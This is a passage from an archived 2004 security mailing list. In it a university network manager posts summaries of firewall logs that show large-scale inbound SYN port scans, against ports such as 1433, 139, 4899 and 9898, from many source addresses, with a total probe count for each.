xxx.yyy.133.237:9898 SYN ******S* [...] Jul 1 23:57:26 202.223.103.18:3762 -> xxx.yyy.154.96:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3764 -> xxx.yyy.154.92:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3766 -> xxx.yyy.154.97:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3773 -> xxx.yyy.154.88:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3774 -> xxx.yyy.154.93:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3794 -> xxx.yyy.154.99:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3802 -> xxx.yyy.154.98:9898 SYN ******S* Jul 1 23:57:26 202.223.103.18:3892 -> xxx.yyy.154.100:9898 SYN ******S* 14798 Jul 1 00:56:34 61.149.212.206:4950 -> xxx.yyy.133.14:5554 SYN ******S* Jul 1 00:56:35 61.149.212.206:1146 -> xxx.yyy.133.14:1023 SYN ******S* Jul 1 00:56:34 61.149.212.206:4953 -> xxx.yyy.133.17:5554 SYN ******S* Jul 1 00:56:35 61.149.212.206:1149 -> xxx.yyy.133.17:1023 SYN ******S* Jul 1 00:56:34 61.149.212.206:4952 -> xxx.yyy.133.16:5554 SYN ******S* Jul 1 00:56:35 61.149.212.206:1148 -> xxx.yyy.133.16:1023 SYN ******S* Jul 1 00:56:34 61.149.212.206:4951 -> xxx.yyy.133.15:5554 SYN ******S* Jul 1 00:56:35 61.149.212.206:1147 -> xxx.yyy.133.15:1023 SYN ******S* [...] Jul 1 00:58:42 61.149.212.206:3365 -> xxx.yyy.153.128:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3372 -> xxx.yyy.153.130:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3374 -> xxx.yyy.153.133:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3373 -> xxx.yyy.153.132:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3382 -> xxx.yyy.153.134:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3381 -> xxx.yyy.153.131:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3383 -> xxx.yyy.153.135:9898 SYN ******S* Jul 1 00:58:42 61.149.212.206:3384 -> xxx.yyy.153.136:9898 SYN ******S* 13034 Jul 1 00:56:43 61.51.90.138:3756 -> xxx.yyy.214.246:5554 SYN ******S* Jul 1 00:56:46 61.51.90.138:1310 -> xxx.yyy.214.246:9898 SYN ******S* Jul 1 00:56:43 61.51.90.138:3784 -> xxx.yyy.215.0:5554 SYN ******S* Jul 1 00:56:43 61.51.90.138:3804 -> xxx.yyy.215.1:5554 SYN ******S* Jul 1 00:56:44 61.51.90.138:4250 -> xxx.yyy.215.1:1023 SYN ******S* Jul 1 00:56:46 61.51.90.138:1360 -> xxx.yyy.215.1:9898 SYN ******S* Jul 1 00:56:43 61.51.90.138:3828 -> xxx.yyy.215.2:5554 SYN ******S* Jul 1 00:56:44 61.51.90.138:4263 -> xxx.yyy.215.2:1023 SYN ******S* [...] Jul 1 00:58:12 61.51.90.138:3764 -> xxx.yyy.235.2:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3771 -> xxx.yyy.234.244:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3772 -> xxx.yyy.235.1:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3787 -> xxx.yyy.235.5:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3781 -> xxx.yyy.235.3:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3784 -> xxx.yyy.235.8:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3793 -> xxx.yyy.235.7:9898 SYN ******S* Jul 1 00:58:12 61.51.90.138:3795 -> xxx.yyy.235.4:9898 SYN ******S* 12798 [...] 12288 Jul 1 00:56:20 221.218.36.146:1874 -> xxx.yyy.235.113:5554 SYN ******S* Jul 1 00:56:21 221.218.36.146:2603 -> xxx.yyy.235.113:1023 SYN ******S* Jul 1 00:56:23 221.218.36.146:3884 -> xxx.yyy.235.113:9898 SYN ******S* Jul 1 00:56:20 221.218.36.146:1884 -> xxx.yyy.235.114:5554 SYN ******S* Jul 1 00:56:21 221.218.36.146:2608 -> xxx.yyy.235.114:1023 SYN ******S* Jul 1 00:56:23 221.218.36.146:3892 -> xxx.yyy.235.114:9898 SYN ******S* Jul 1 00:56:21 221.218.36.146:1877 -> xxx.yyy.235.115:5554 SYN ******S* Jul 1 00:56:21 221.218.36.146:2609 -> xxx.yyy.235.115:1023 SYN ******S* [...] Jul 1 00:57:50 221.218.36.146:3818 -> xxx.yyy.255.146:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:3813 -> xxx.yyy.255.144:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:3819 -> xxx.yyy.255.145:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:3861 -> xxx.yyy.255.147:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:3865 -> xxx.yyy.255.148:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:4035 -> xxx.yyy.255.150:9898 SYN ******S* Jul 1 00:57:50 221.218.36.146:4037 -> xxx.yyy.255.149:9898 SYN ******S* Jul 1 00:57:53 221.218.36.146:1900 -> xxx.yyy.255.234:9898 SYN ******S* 12080 Jul 1 00:56:15 61.51.63.169:3494 -> xxx.yyy.154.100:5554 SYN ******S* Jul 1 00:56:16 61.51.63.169:3777 -> xxx.yyy.154.100:1023 SYN ******S* Jul 1 00:56:18 61.51.63.169:4325 -> xxx.yyy.154.100:9898 SYN ******S* Jul 1 00:56:15 61.51.63.169:3496 -> xxx.yyy.154.102:5554 SYN ******S* Jul 1 00:56:16 61.51.63.169:3778 -> xxx.yyy.154.102:1023 SYN ******S* Jul 1 00:56:18 61.51.63.169:4326 -> xxx.yyy.154.102:9898 SYN ******S* Jul 1 00:56:15 61.51.63.169:3498 -> xxx.yyy.154.104:5554 SYN ******S* Jul 1 00:56:16 61.51.63.169:3783 -> xxx.yyy.154.104:1023 SYN ******S* [...] Jul 1 00:57:32 61.51.63.169:2849 -> xxx.yyy.174.215:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2850 -> xxx.yyy.174.216:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2858 -> xxx.yyy.174.218:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2857 -> xxx.yyy.174.217:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2860 -> xxx.yyy.174.220:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2863 -> xxx.yyy.174.221:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2859 -> xxx.yyy.174.219:9898 SYN ******S* Jul 1 00:57:32 61.51.63.169:2864 -> xxx.yyy.174.222:9898 SYN ******S* 11880 Jul 1 00:56:19 61.55.27.181:3604 -> xxx.yyy.235.112:5554 SYN ******S* Jul 1 00:56:20 61.55.27.181:4395 -> xxx.yyy.235.112:1023 SYN ******S* Jul 1 00:56:22 61.55.27.181:2176 -> xxx.yyy.235.112:9898 SYN ******S* Jul 1 00:56:19 61.55.27.181:3609 -> xxx.yyy.235.116:5554 SYN ******S* Jul 1 00:56:20 61.55.27.181:4397 -> xxx.yyy.235.116:1023 SYN ******S* Jul 1 00:56:22 61.55.27.181:2177 -> xxx.yyy.235.116:9898 SYN ******S* Jul 1 00:56:19 61.55.27.181:3605 -> xxx.yyy.235.113:5554 SYN ******S* Jul 1 00:56:22 61.55.27.181:2178 -> xxx.yyy.235.113:9898 SYN ******S* [...] Jul 1 00:57:05 61.55.27.181:1056 -> xxx.yyy.255.41:9898 SYN ******S* Jul 1 00:57:05 61.55.27.181:1057 -> xxx.yyy.255.42:9898 SYN ******S* Jul 1 00:57:05 61.55.27.181:1249 -> xxx.yyy.255.89:9898 SYN ******S* Jul 1 00:57:05 61.55.27.181:1253 -> xxx.yyy.255.92:9898 SYN ******S* Jul 1 00:57:06 61.55.27.181:1672 -> xxx.yyy.255.141:9898 SYN ******S* Jul 1 00:57:07 61.55.27.181:2010 -> xxx.yyy.255.200:9898 SYN ******S* Jul 1 00:57:07 61.55.27.181:2014 -> xxx.yyy.255.204:9898 SYN ******S* Jul 1 00:57:07 61.55.27.181:2034 -> xxx.yyy.255.225:9898 SYN ******S* 11652 Jul 1 00:56:46 218.191.196.81:3252 -> xxx.yyy.215.210:5554 SYN ******S* Jul 1 00:56:47 218.191.196.81:3670 -> xxx.yyy.215.210:1023 SYN ******S* Jul 1 00:56:49 218.191.196.81:4720 -> xxx.yyy.215.210:9898 SYN ******S* Jul 1 00:56:46 218.191.196.81:3253 -> xxx.yyy.215.211:5554 SYN ******S* Jul 1 00:56:47 218.191.196.81:3671 -> xxx.yyy.215.211:1023 SYN ******S* Jul 1 00:56:49 218.191.196.81:4721 -> xxx.yyy.215.211:9898 SYN ******S* Jul 1 00:56:46 218.191.196.81:3258 -> xxx.yyy.215.216:5554 SYN ******S* Jul 1 00:56:47 218.191.196.81:3676 -> xxx.yyy.215.216:1023 SYN ******S* [...] Jul 1 00:57:32 218.191.196.81:4562 -> xxx.yyy.236.59:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4569 -> xxx.yyy.236.66:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4570 -> xxx.yyy.236.67:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4571 -> xxx.yyy.236.68:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4574 -> xxx.yyy.236.69:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4575 -> xxx.yyy.236.70:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4576 -> xxx.yyy.236.71:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4577 -> xxx.yyy.236.72:9898 SYN ******S* Jul 1 00:57:32 218.191.196.81:4578 -> xxx.yyy.236.73:9898 SYN ******S* 11110 Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 1 08:54:44 219.35.68.133:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 1 08:54:45 219.35.68.133:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.254:3127 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.254:1080 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.254:10080 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.254:3128 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.255:3127 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.255:1080 SYN ******S* Jul 1 09:29:08 219.35.68.133:22002 -> xxx.yyy.20.255:10080 SYN ******S* Jul 1 09:29:09 219.35.68.133:22002 -> xxx.yyy.20.255:3128 SYN ******S* 10991 Jul 1 00:56:16 218.25.79.82:4151 -> xxx.yyy.235.118:5554 SYN ******S* Jul 1 00:56:17 218.25.79.82:1069 -> xxx.yyy.235.118:1023 SYN ******S* Jul 1 00:56:19 218.25.79.82:2076 -> xxx.yyy.235.118:9898 SYN ******S* Jul 1 00:56:16 218.25.79.82:4144 -> xxx.yyy.235.112:5554 SYN ******S* Jul 1 00:56:17 218.25.79.82:1062 -> xxx.yyy.235.112:1023 SYN ******S* Jul 1 00:56:19 218.25.79.82:2070 -> xxx.yyy.235.112:9898 SYN ******S* Jul 1 00:56:16 218.25.79.82:4146 -> xxx.yyy.235.113:5554 SYN ******S* Jul 1 00:56:17 218.25.79.82:1065 -> xxx.yyy.235.113:1023 SYN ******S* [...] Jul 1 00:57:00 218.25.79.82:2035 -> xxx.yyy.255.227:9898 SYN ******S* Jul 1 00:57:00 218.25.79.82:2036 -> xxx.yyy.255.228:9898 SYN ******S* Jul 1 00:57:00 218.25.79.82:2038 -> xxx.yyy.255.230:9898 SYN ******S* Jul 1 00:57:00 218.25.79.82:2037 -> xxx.yyy.255.229:9898 SYN ******S* Jul 1 00:57:00 218.25.79.82:2039 -> xxx.yyy.255.231:9898 SYN ******S* Jul 1 00:57:00 218.25.79.82:2040 -> xxx.yyy.255.232:9898 SYN ******S* Jul 1 00:57:00 218.25.79.82:2042 -> xxx.yyy.255.234:9898 SYN ******S* Jul 1 00:57:00 218.25.79.82:2041 -> xxx.yyy.255.233:9898 SYN ******S* 9240 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From Ken.Connelly at uni.edu Sat Jul 3 18:55:54 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Sat, 03 Jul 2004 13:55:54 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LC0ZGL94B88YCV4W@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 2 06:26:44 218.62.5.158:58031 -> xxx.yyy.1.0:443 SYN ******S* Jul 2 06:26:44 218.62.5.158:58032 -> xxx.yyy.1.1:443 SYN ******S* Jul 2 06:26:44 218.62.5.158:58033 -> xxx.yyy.1.2:443 SYN ******S* Jul 2 06:26:44 218.62.5.158:58034 -> xxx.yyy.1.3:443 SYN ******S* Jul 2 06:26:47 218.62.5.158:58035 -> xxx.yyy.1.4:443 SYN ******S* Jul 2 06:26:47 218.62.5.158:58036 -> xxx.yyy.1.5:443 SYN ******S* Jul 2 06:26:47 218.62.5.158:58037 -> xxx.yyy.1.6:443 SYN ******S* Jul 2 06:26:47 218.62.5.158:58038 -> xxx.yyy.1.7:443 SYN ******S* [...] Jul 2 06:38:37 218.62.5.158:39000 -> xxx.yyy.255.251:443 SYN ******S* Jul 2 06:38:37 218.62.5.158:38998 -> xxx.yyy.255.249:443 SYN ******S* Jul 2 06:38:37 218.62.5.158:38982 -> xxx.yyy.255.233:443 SYN ******S* Jul 2 06:38:37 218.62.5.158:38975 -> xxx.yyy.255.226:443 SYN ******S* Jul 2 06:38:37 218.62.5.158:38987 -> xxx.yyy.255.238:443 SYN ******S* Jul 2 06:38:37 218.62.5.158:38995 -> xxx.yyy.255.246:443 SYN ******S* Jul 2 06:38:37 218.62.5.158:38997 -> xxx.yyy.255.248:443 SYN ******S* Jul 2 06:38:37 218.62.5.158:39003 -> xxx.yyy.255.254:443 SYN ******S* 99014 Jul 2 06:07:02 212.240.38.132:2394 -> xxx.yyy.1.1:20168 SYN ******S* Jul 2 06:07:02 212.240.38.132:2395 -> xxx.yyy.1.2:20168 SYN ******S* Jul 2 06:07:02 212.240.38.132:2396 -> xxx.yyy.1.3:20168 SYN ******S* Jul 2 06:07:03 212.240.38.132:2397 -> xxx.yyy.1.4:20168 SYN ******S* Jul 2 06:07:03 212.240.38.132:2398 -> xxx.yyy.1.5:20168 SYN ******S* Jul 2 06:07:03 212.240.38.132:2399 -> xxx.yyy.1.6:20168 SYN ******S* Jul 2 06:07:03 212.240.38.132:2400 -> xxx.yyy.1.7:20168 SYN ******S* Jul 2 06:07:03 212.240.38.132:2401 -> xxx.yyy.1.8:20168 SYN ******S* [...] Jul 2 06:31:13 212.240.38.132:2634 -> xxx.yyy.zzz.247:20168 SYN ******S* Jul 2 06:31:13 212.240.38.132:2641 -> xxx.yyy.zzz.254:20168 SYN ******S* Jul 2 06:31:13 212.240.38.132:2638 -> xxx.yyy.zzz.251:20168 SYN ******S* Jul 2 06:31:13 212.240.38.132:2635 -> xxx.yyy.zzz.248:20168 SYN ******S* Jul 2 06:31:13 212.240.38.132:2639 -> xxx.yyy.zzz.252:20168 SYN ******S* Jul 2 06:31:13 212.240.38.132:2636 -> xxx.yyy.zzz.249:20168 SYN ******S* Jul 2 06:31:13 212.240.38.132:2633 -> xxx.yyy.zzz.246:20168 SYN ******S* Jul 2 06:31:13 212.240.38.132:2640 -> xxx.yyy.zzz.253:20168 SYN ******S* Jul 2 06:31:13 212.240.38.132:2637 -> xxx.yyy.zzz.250:20168 SYN ******S* 74084 Jul 2 05:54:17 212.79.129.49:2727 -> xxx.yyy.1.1:1433 SYN ******S* Jul 2 05:54:17 212.79.129.49:2728 -> xxx.yyy.1.2:1433 SYN ******S* Jul 2 05:54:17 212.79.129.49:2729 -> xxx.yyy.1.3:1433 SYN ******S* Jul 2 05:54:14 212.79.129.49:2731 -> xxx.yyy.1.5:1433 SYN ******S* Jul 2 05:54:14 212.79.129.49:2730 -> xxx.yyy.1.4:1433 SYN ******S* Jul 2 05:54:17 212.79.129.49:2732 -> xxx.yyy.1.6:1433 SYN ******S* Jul 2 05:54:17 212.79.129.49:2733 -> xxx.yyy.1.7:1433 SYN ******S* Jul 2 05:54:17 212.79.129.49:2734 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 2 06:05:56 212.79.129.49:4171 -> xxx.yyy.255.218:1433 SYN ******S* Jul 2 06:05:56 212.79.129.49:4168 -> xxx.yyy.255.216:1433 SYN ******S* Jul 2 06:05:56 212.79.129.49:4170 -> xxx.yyy.255.217:1433 SYN ******S* Jul 2 06:05:56 212.79.129.49:4166 -> xxx.yyy.255.215:1433 SYN ******S* Jul 2 06:05:57 212.79.129.49:4176 -> xxx.yyy.255.222:1433 SYN ******S* Jul 2 06:05:57 212.79.129.49:4178 -> xxx.yyy.255.224:1433 SYN ******S* Jul 2 06:05:57 212.79.129.49:4180 -> xxx.yyy.255.226:1433 SYN ******S* Jul 2 06:05:57 212.79.129.49:4177 -> xxx.yyy.255.223:1433 SYN ******S* Jul 2 06:05:57 212.79.129.49:4179 -> xxx.yyy.255.225:1433 SYN ******S* 71735 Jul 2 18:44:13 213.242.147.168:1112 -> xxx.yyy.1.1:1433 SYN ******S* Jul 2 18:44:13 213.242.147.168:1113 -> xxx.yyy.1.2:1433 SYN ******S* Jul 2 18:44:15 213.242.147.168:1114 -> xxx.yyy.1.3:1433 SYN ******S* Jul 2 18:44:15 213.242.147.168:1115 -> xxx.yyy.1.4:1433 SYN ******S* Jul 2 18:44:13 213.242.147.168:1116 -> xxx.yyy.1.5:1433 SYN ******S* Jul 2 18:44:16 213.242.147.168:1117 -> xxx.yyy.1.6:1433 SYN ******S* Jul 2 18:44:16 213.242.147.168:1118 -> xxx.yyy.1.7:1433 SYN ******S* Jul 2 18:44:16 213.242.147.168:1119 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 2 18:55:54 213.242.147.168:3531 -> xxx.yyy.255.239:1433 SYN ******S* Jul 2 18:55:54 213.242.147.168:3532 -> xxx.yyy.255.240:1433 SYN ******S* Jul 2 18:55:54 213.242.147.168:3533 -> xxx.yyy.255.241:1433 SYN ******S* Jul 2 18:55:54 213.242.147.168:3534 -> xxx.yyy.255.242:1433 SYN ******S* Jul 2 18:55:54 213.242.147.168:3535 -> xxx.yyy.255.243:1433 SYN ******S* Jul 2 18:55:54 213.242.147.168:3539 -> xxx.yyy.255.247:1433 SYN ******S* Jul 2 18:55:54 213.242.147.168:3543 -> xxx.yyy.255.251:1433 SYN ******S* Jul 2 18:55:54 213.242.147.168:3544 -> xxx.yyy.255.252:1433 SYN ******S* Jul 2 18:55:54 213.242.147.168:3545 -> xxx.yyy.255.253:1433 SYN ******S* 71277 Jul 2 14:24:47 82.41.88.225:1534 -> xxx.yyy.1.11:1433 SYN ******S* Jul 2 14:24:47 82.41.88.225:1529 -> xxx.yyy.1.10:1433 SYN ******S* Jul 2 14:24:47 82.41.88.225:1539 -> xxx.yyy.1.12:1433 SYN ******S* Jul 2 14:24:47 82.41.88.225:1568 -> xxx.yyy.1.13:1433 SYN ******S* Jul 2 14:24:50 82.41.88.225:1591 -> xxx.yyy.1.16:1433 SYN ******S* Jul 2 14:24:50 82.41.88.225:1595 -> xxx.yyy.1.17:1433 SYN ******S* Jul 2 14:24:50 82.41.88.225:1612 -> xxx.yyy.1.18:1433 SYN ******S* Jul 2 14:24:50 82.41.88.225:1616 -> xxx.yyy.1.20:1433 SYN ******S* [...] Jul 2 18:13:30 82.41.88.225:4112 -> xxx.yyy.255.234:1433 SYN ******S* Jul 2 18:13:30 82.41.88.225:4121 -> xxx.yyy.255.235:1433 SYN ******S* Jul 2 18:13:30 82.41.88.225:4104 -> xxx.yyy.255.233:1433 SYN ******S* Jul 2 18:13:30 82.41.88.225:4101 -> xxx.yyy.255.232:1433 SYN ******S* Jul 2 18:13:30 82.41.88.225:4172 -> xxx.yyy.255.236:1433 SYN ******S* Jul 2 18:13:30 82.41.88.225:4356 -> xxx.yyy.255.238:1433 SYN ******S* Jul 2 18:13:30 82.41.88.225:4474 -> xxx.yyy.255.243:1433 SYN ******S* Jul 2 18:13:30 82.41.88.225:4472 -> xxx.yyy.255.242:1433 SYN ******S* 66415 Jul 2 06:34:47 212.217.40.8:3915 -> xxx.yyy.1.1:139 SYN ******S* Jul 2 06:34:50 212.217.40.8:3919 -> xxx.yyy.1.2:139 SYN ******S* Jul 2 06:34:50 212.217.40.8:3921 -> xxx.yyy.1.3:139 SYN ******S* Jul 2 06:34:50 212.217.40.8:3923 -> xxx.yyy.1.4:139 SYN ******S* Jul 2 06:34:50 212.217.40.8:3925 -> xxx.yyy.1.5:139 SYN ******S* Jul 2 06:34:47 212.217.40.8:3927 -> xxx.yyy.1.6:139 SYN ******S* Jul 2 06:34:50 212.217.40.8:3929 -> xxx.yyy.1.7:139 SYN ******S* Jul 2 06:34:50 212.217.40.8:3932 -> xxx.yyy.1.8:139 SYN ******S* [...] Jul 2 06:47:33 212.217.40.8:2926 -> xxx.yyy.255.248:139 SYN ******S* Jul 2 06:47:33 212.217.40.8:2916 -> xxx.yyy.255.243:139 SYN ******S* Jul 2 06:47:33 212.217.40.8:2922 -> xxx.yyy.255.246:139 SYN ******S* Jul 2 06:47:33 212.217.40.8:2928 -> xxx.yyy.255.249:139 SYN ******S* Jul 2 06:47:33 212.217.40.8:2918 -> xxx.yyy.255.244:139 SYN ******S* Jul 2 06:47:33 212.217.40.8:2924 -> xxx.yyy.255.247:139 SYN ******S* Jul 2 06:47:33 212.217.40.8:2933 -> xxx.yyy.255.251:139 SYN ******S* Jul 2 06:47:33 212.217.40.8:2940 -> xxx.yyy.255.254:139 SYN ******S* Jul 2 06:47:33 212.217.40.8:2935 -> xxx.yyy.255.252:139 SYN ******S* 65526 Jul 2 08:09:59 66.236.14.101:3132 -> xxx.yyy.1.1:554 SYN ******S* Jul 2 08:09:59 66.236.14.101:3133 -> xxx.yyy.1.2:554 SYN ******S* Jul 2 08:09:59 66.236.14.101:3134 -> xxx.yyy.1.3:554 SYN ******S* Jul 2 08:10:01 66.236.14.101:3135 -> xxx.yyy.1.4:554 SYN ******S* Jul 2 08:10:01 66.236.14.101:3136 -> xxx.yyy.1.5:554 SYN ******S* Jul 2 08:10:01 66.236.14.101:3137 -> xxx.yyy.1.6:554 SYN ******S* Jul 2 08:10:01 66.236.14.101:3138 -> xxx.yyy.1.7:554 SYN ******S* Jul 2 08:10:01 66.236.14.101:3139 -> xxx.yyy.1.8:554 SYN ******S* [...] Jul 2 08:18:35 66.236.14.101:1487 -> xxx.yyy.255.224:554 SYN ******S* Jul 2 08:18:35 66.236.14.101:1488 -> xxx.yyy.255.225:554 SYN ******S* Jul 2 08:18:35 66.236.14.101:1489 -> xxx.yyy.255.226:554 SYN ******S* Jul 2 08:18:35 66.236.14.101:1490 -> xxx.yyy.255.227:554 SYN ******S* Jul 2 08:18:35 66.236.14.101:1491 -> xxx.yyy.255.228:554 SYN ******S* Jul 2 08:18:35 66.236.14.101:1492 -> xxx.yyy.255.229:554 SYN ******S* Jul 2 08:18:35 66.236.14.101:1493 -> xxx.yyy.255.230:554 SYN ******S* Jul 2 08:18:35 66.236.14.101:1494 -> xxx.yyy.255.231:554 SYN ******S* 49318 Jul 2 19:09:55 218.27.56.14:42703 -> xxx.yyy.1.5:4899 SYN ******S* Jul 2 19:09:55 218.27.56.14:42704 -> xxx.yyy.1.6:4899 SYN ******S* Jul 2 19:09:58 218.27.56.14:42710 -> xxx.yyy.1.4:4899 SYN ******S* Jul 2 19:09:57 218.27.56.14:42714 -> xxx.yyy.1.14:4899 SYN ******S* Jul 2 19:09:58 218.27.56.14:42715 -> xxx.yyy.1.15:4899 SYN ******S* Jul 2 19:09:57 218.27.56.14:42716 -> xxx.yyy.1.16:4899 SYN ******S* Jul 2 19:09:57 218.27.56.14:42717 -> xxx.yyy.1.17:4899 SYN ******S* Jul 2 19:09:58 218.27.56.14:42722 -> xxx.yyy.1.13:4899 SYN ******S* [...] Jul 2 19:23:40 218.27.56.14:56512 -> xxx.yyy.241.146:4899 SYN ******S* Jul 2 19:23:40 218.27.56.14:58285 -> xxx.yyy.241.147:4899 SYN ******S* Jul 2 19:23:40 218.27.56.14:58286 -> xxx.yyy.241.149:4899 SYN ******S* Jul 2 19:23:40 218.27.56.14:54677 -> xxx.yyy.241.148:4899 SYN ******S* Jul 2 19:23:40 218.27.56.14:58287 -> xxx.yyy.241.152:4899 SYN ******S* Jul 2 19:23:40 218.27.56.14:56513 -> xxx.yyy.241.153:4899 SYN ******S* Jul 2 19:23:40 218.27.56.14:56515 -> xxx.yyy.241.151:4899 SYN ******S* Jul 2 19:23:40 218.27.56.14:58288 -> xxx.yyy.241.154:4899 SYN ******S* Jul 2 19:23:40 218.27.56.14:56514 -> xxx.yyy.241.150:4899 SYN ******S* 44405 Jul 2 08:55:28 218.238.121.105:4684 -> xxx.yyy.1.0:4899 SYN ******S* Jul 2 08:55:28 218.238.121.105:4686 -> xxx.yyy.1.2:4899 SYN ******S* Jul 2 08:55:28 218.238.121.105:4687 -> xxx.yyy.1.3:4899 SYN ******S* Jul 2 08:55:27 218.238.121.105:4689 -> xxx.yyy.1.5:4899 SYN ******S* Jul 2 08:55:27 218.238.121.105:4691 -> xxx.yyy.1.7:4899 SYN ******S* Jul 2 08:55:27 218.238.121.105:4688 -> xxx.yyy.1.4:4899 SYN ******S* Jul 2 08:55:27 218.238.121.105:4693 -> xxx.yyy.1.9:4899 SYN ******S* Jul 2 08:55:27 218.238.121.105:4694 -> xxx.yyy.1.10:4899 SYN ******S* [...] Jul 2 09:35:01 218.238.121.105:2998 -> xxx.yyy.254.251:4899 SYN ******S* Jul 2 09:35:01 218.238.121.105:2992 -> xxx.yyy.254.245:4899 SYN ******S* Jul 2 09:35:01 218.238.121.105:2999 -> xxx.yyy.254.252:4899 SYN ******S* Jul 2 09:35:01 218.238.121.105:2987 -> xxx.yyy.254.240:4899 SYN ******S* Jul 2 09:35:01 218.238.121.105:2989 -> xxx.yyy.254.242:4899 SYN ******S* Jul 2 09:35:01 218.238.121.105:2990 -> xxx.yyy.254.243:4899 SYN ******S* Jul 2 09:35:01 218.238.121.105:2991 -> xxx.yyy.254.244:4899 SYN ******S* Jul 2 09:35:01 218.238.121.105:2993 -> xxx.yyy.254.246:4899 SYN ******S* Jul 2 09:35:01 218.238.121.105:3000 -> xxx.yyy.254.253:4899 SYN ******S* 44336 Jul 2 21:47:30 195.174.64.199:3330 -> xxx.yyy.1.1:139 SYN ******S* Jul 2 21:47:30 195.174.64.199:3331 -> xxx.yyy.1.2:139 SYN ******S* Jul 2 21:47:30 195.174.64.199:3332 -> xxx.yyy.1.3:139 SYN ******S* Jul 2 21:47:30 195.174.64.199:3333 -> xxx.yyy.1.4:139 SYN ******S* Jul 2 21:47:30 195.174.64.199:3334 -> xxx.yyy.1.5:139 SYN ******S* Jul 2 21:47:30 195.174.64.199:3338 -> xxx.yyy.1.9:139 SYN ******S* Jul 2 21:47:30 195.174.64.199:3339 -> xxx.yyy.1.10:139 SYN ******S* Jul 2 21:47:30 195.174.64.199:3340 -> xxx.yyy.1.11:139 SYN ******S* [...] Jul 2 21:58:30 195.174.64.199:3650 -> xxx.yyy.255.83:139 SYN ******S* Jul 2 21:58:30 195.174.64.199:3666 -> xxx.yyy.255.99:139 SYN ******S* Jul 2 21:58:30 195.174.64.199:3663 -> xxx.yyy.255.96:139 SYN ******S* Jul 2 21:58:30 195.174.64.199:3660 -> xxx.yyy.255.93:139 SYN ******S* Jul 2 21:58:30 195.174.64.199:3682 -> xxx.yyy.255.115:139 SYN ******S* Jul 2 21:58:30 195.174.64.199:3695 -> xxx.yyy.255.128:139 SYN ******S* Jul 2 21:58:30 195.174.64.199:3692 -> xxx.yyy.255.125:139 SYN ******S* Jul 2 21:58:30 195.174.64.199:3698 -> xxx.yyy.255.131:139 SYN ******S* Jul 2 21:58:31 195.174.64.199:3730 -> xxx.yyy.255.163:139 SYN ******S* 38256 Jul 2 08:25:21 212.234.232.145:4433 -> xxx.yyy.1.0:1433 SYN ******S* Jul 2 08:25:21 212.234.232.145:4435 -> xxx.yyy.1.1:1433 SYN ******S* Jul 2 08:25:21 212.234.232.145:4437 -> xxx.yyy.1.2:1433 SYN ******S* Jul 2 08:25:21 212.234.232.145:4438 -> xxx.yyy.1.3:1433 SYN ******S* Jul 2 08:25:21 212.234.232.145:4439 -> xxx.yyy.1.4:1433 SYN ******S* Jul 2 08:25:21 212.234.232.145:4440 -> xxx.yyy.1.5:1433 